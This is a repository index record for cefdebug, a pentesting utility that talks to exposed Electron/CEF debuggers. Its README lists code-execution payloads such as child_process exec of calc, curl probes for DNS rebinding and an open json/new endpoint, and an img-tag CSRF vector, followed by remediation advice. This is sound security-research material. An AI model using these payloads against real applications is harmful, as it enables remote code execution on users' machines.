{"id":17988742,"url":"https://github.com/taviso/cefdebug","last_synced_at":"2025-06-13T05:04:22.133Z","repository":{"id":148963250,"uuid":"212596758","full_name":"taviso/cefdebug","owner":"taviso","description":"Minimal code to connect to a CEF debugger.","archived":false,"fork":false,"pushed_at":"2020-06-10T23:32:48.000Z","size":79,"stargazers_count":204,"open_issues_count":0,"forks_count":19,"subscribers_count":6,"default_branch":"master","last_synced_at":"2025-04-06T14:07:00.912Z","etag":null,"topics":["cef","electron","security","windows"],"latest_commit_sha":null,"homepage":null,"language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/taviso.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2019-10-03T14:09:45.000Z","updated_at":"2025-03-18T15:26:33.000Z","dependencies_parsed_at":"2023-05-02T23:31:07.817Z","dependency_job_id":null,"html_url":"https://github.com/taviso/cefdebug","commit_stats":null,"previous_names":[],"tags_count":2,"template":false,"template_full_name":null,"purl":"pkg:github/taviso/cefdebug","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/taviso","download_url":"https://codeload.github.com/taviso/cefdebug/tar.gz/refs/heads/master","s
bom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/taviso%2Fcefdebug/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":259584749,"owners_count":22880194,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cef","electron","security","windows"],"created_at":"2024-10-29T19:12:40.441Z","updated_at":"2025-06-13T05:04:22.108Z","avatar_url":"https://github.com/taviso.png","language":"C","funding_links":[],"categories":["Tools"],"sub_categories":["Others"],"readme":"# cefdebug\n\nThis is a minimal commandline utility and/or reference code for using\nlibwebsockets to connect to an electron/CEF/chromium debugger.\n\nYou're probably thinking, \"who would enable the debugger in shipping products?\".\nWell, it turns out just about everyone shipping electron or CEF has made this\nmistake at least once.\n\nIn some configurations, you can pop a shell remotely just by making a victim\nclick a link.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=773\n\nIn older versions, you could pop a shell remotely using DNS rebinding.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1742\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1946\n\nIn current versions, you can compromise other local users or escape sandboxes.\n\nExample: https://bugs.chromium.org/p/project-zero/issues/detail?id=1944\n\nIt happens so often, that I thought pentesters might find it useful to have some\ncode easily available to interact with them.\n\n# Usage\n\nFirst, scan the local machine\n\n```\n$ 
./cefdebug.exe\n[2019/10/04 16:18:56:7288] U: There are 3 tcp sockets in state listen.\n[2019/10/04 16:18:56:7766] U: There were 1 servers that appear to be CEF debuggers.\n[2019/10/04 16:18:56:7816] U: ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a\n```\n\nNow you can send commands to that `ws://` URL.\n\n```\n$ ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code \"process.version\"\n[2019/10/04 16:35:06:2645] U: \u003e\u003e\u003e process.version\n[2019/10/04 16:35:06:2685] U: \u003c\u003c\u003c v10.11.0\n```\n\nAlternatively, you can start a simple interactive shell.\n\n```\n$ ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a\n\u003e\u003e\u003e ['hello', 'world'].join(' ')\n[2019/10/04 16:36:31:0964] U: \u003c\u003c\u003c hello world\n\u003e\u003e\u003e a = 1024\n[2019/10/04 16:36:44:5250] U: \u003c\u003c\u003c 1024\n\u003e\u003e\u003e a * 2\n[2019/10/04 16:36:48:3005] U: \u003c\u003c\u003c 2048\n\u003e\u003e\u003e quit\n```\n\n## Known Examples\n\nHere is a list of code snippets I've seen that allow code exec in different electron\napplications.\n\n`process.mainModule.require('child_process').exec('calc')`\n\n`window.appshell.app.openURLInDefaultBrowser(\"c:/windows/system32/calc.exe\")`\n\n`require('child_process').spawnSync('calc.exe')`\n\n`Browser.open(JSON.stringify({url: \"c:\\\\windows\\\\system32\\\\calc.exe\"}))`\n\n## Notes\n\nHere are things to test if you find a debugger.\n\n* Does it prevent [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding)?\n\n`$ curl -H 'Host: example.com' -si 'http://127.0.0.1:9234/json/list'`\n\n🚨 If that works (i.e. a JSON response), this is **remotely** exploitable. 🚨\n\nNewer versions of chromium require that the Host header match `localhost` or an\nIP address to prevent this. If this works, the application you're looking at is\nbased on an older version of chromium, and leaving the debugger enabled can be\n**remotely** exploited. 
You have found a critical vulnerability and should\nreport it urgently.\n\n* Is the `new` command functioning?\n\n`$ curl -si 'http://127.0.0.1:9234/json/new?javascript:alert(1)'`\n\n🔥🚨 If that works (i.e. a json response), this is **easily** **remotely** exploitable. 🚨🔥\n\nThis command requires no authentication, and has no CSRF protection. Just\n`\u003cimg src=http://127.0.0.1:port/json/new?javascript:...\u003e` in a website is\nenough to exploit it. Even if the port is randomized, it can be brute forced\neasily.\n\nThis is a very critical vulnerability, and should be reported urgently.\n\n# Solution\n\nIf you maintain a CEF project and you've noticed you're vulnerable to this\nattack, you probably need to change this setting in your `cef_settings_t`\nfor production builds:\n\nhttps://magpcss.org/ceforum/apidocs3/projects/(default)/_cef_settings_t.html#remote_debugging_port\n\nIn electron, it's possible you're doing something like:\n\n`app.commandLine.appendSwitch('remote-debugging-port'...)`\n\nIf you're using node, perhaps you're using `--inspect` on child processes.\n\nhttps://nodejs.org/de/docs/guides/debugging-getting-started/#security-implications\n\n# Building\n\n## Windows \n\n\u003e If you don't want to build it yourself, check out the [releases](https://github.com/taviso/cefdebug/releases) tab\n\nI used [GNU make](http://gnuwin32.sourceforge.net/packages/make.htm) and Visual\nStudio 2019 to develop `cefdebug`. 
\n\nIf all the dependencies are installed, just typing `make` in a developer command\nprompt should be enough.\n\nI use the \"Build Tools\" variant of Visual Studio, and the only components I have\nselected are MSVC, MSBuild, CMake and the SDK.\n\nThis project uses submodules for some of the dependencies; be sure that you're\nusing a command like this to fetch all the required code.\n\n```\ngit submodule update --init --recursive\n```\n\n## Linux\n\nThe main dependencies are libwebsockets and libreadline.\n\nOn Fedora, try:\n\n`yum install readline-devel libwebsockets-devel openssl-devel`\n\nIf the dependencies are installed, try `make -f GNUmakefile.linux`\n\n## Embedding\n\nThe code is intended to be simple enough to embed in other pentesting tools.\n\n# Authors\n\nTavis Ormandy \u003ctaviso@gmail.com\u003e\n\n# License\n\nAll original code is Apache 2.0; see the LICENSE file for details.\n\nThe following components are imported third-party projects.\n\n* [wineditline](http://mingweditline.sourceforge.net/), by Paolo Tosco.\n  * wineditline is used to implement user-friendly command-line input and\n    history editing.\n* [libwebsockets](https://libwebsockets.org), by Andy Green et al.\n  * libwebsockets is a portable C implementation of HTML5 websockets.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftaviso%2Fcefdebug","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftaviso%2Fcefdebug","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftaviso%2Fcefdebug/lists"}